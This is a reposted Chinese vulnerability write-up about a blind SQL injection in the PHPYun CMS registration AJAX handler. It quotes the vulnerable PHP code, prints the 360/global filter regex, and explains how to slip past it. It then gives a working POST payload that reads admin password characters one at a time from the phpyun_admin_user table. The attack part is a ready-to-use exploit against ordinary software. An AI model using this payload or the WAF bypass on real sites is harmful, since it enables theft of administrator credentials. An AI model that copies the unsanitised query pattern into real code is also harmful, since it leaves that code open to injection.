phpyun注射绕过360防护

没穿底裤 2020年1月1日03:08:52漏洞时代评论312 views1585字阅读5分17秒阅读模式
摘要

注册时检测会员是否使用问题model/register.class.php23 行[php]function ajax_reg_action(){


漏洞作者: Noxxx

注册时检测会员是否使用问题

model/register.class.php

23 行

[php]

function ajax_reg_action(){

$post = array_keys($_POST);

$key_name = $post[0];

if($key_name=="username"){

[email protected]("utf-8","gbk",$_POST['username']);

 

if($this->config['sy_uc_type']=="uc_center"){

$this->obj->uc_open();

$user = uc_get_user($username);

}else{

$user = $this->obj->DB_select_once("member","`username`='".$username."'");

}

if($this->config['sy_regname']!=""){

[email protected](",",$this->config['sy_regname']);

if(in_array($username,$regname)){

echo 2;die;

}

}

}else{

 

#$key_name可控 带入查询 .

$user = $this->obj->DB_select_once("member","`".$key_name."`='".$_POST[$key_name]."'");

}

if(is_array($user)){echo 1;}else{echo 0;}

}

[/php]

 

没有回显只能盲注了.

里面有个全局过滤和360的 360的白名单就行了 全局过滤还是比较坑的

db.safety.php

[php]

$postfilter = "<.*=(&#//d+?;?)+?>|<.*data=data:text///html.*>|//b(alert//(|confirm//(|expression//(|prompt//(|benchmark/s*?//(/d+?|sleep/s*?//([/d/.]+?//)|load_file/s*?//()|<[^>]*?//b(onerror|onmousemove|onload|onclick|onmouseover)//b|//b(and|or)//b//s*?([//(//)'/"//d]+?=[//(//)'/"//d]+?|[//(//)'/"a-zA-Z]+?=[//(//)'/"a-zA-Z]+?|>|<|/s+?[//w]+?//s+?//bin//b//s*?/(|//blike//b//s+?[/"'])|/////*.+?//*///|/////*//*///|<//s*script//b|//bEXEC//b|UNION.+?SELECT(//(.+//)|//s+?.+?)|UPDATE(//(.+//)|//s+?.+?)SET|INSERT//s+INTO.+?VALUES|(SELECT|DELETE)(//(.+//)|//s+?.+?//s+?)FROM(//(.+//)|//s+?.+?)|(CREATE|ALTER|DROP|TRUNCATE)//s+(TABLE|DATABASE)";

[/php]

只要检测文本不连续出现关键词就通过了

底下还有一个过滤值的,不过也没关键词.

exp:

http://0day5.com/phpyun/?m=register&c=ajax_reg&admin_dir=admin

(POST)

uid`%26%26(SELECT(MID(password,1,1)%3D'1')FROM/**=**/phpyun_admin_user)%23 (会员表里有数据就行 )

 

成功返回1

失败返回0

phpyun注射绕过360防护

 

漏洞证明:

phpyun注射绕过360防护

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日03:08:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  phpyun注射绕过360防护 https://cn-sec.com/archives/75739.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: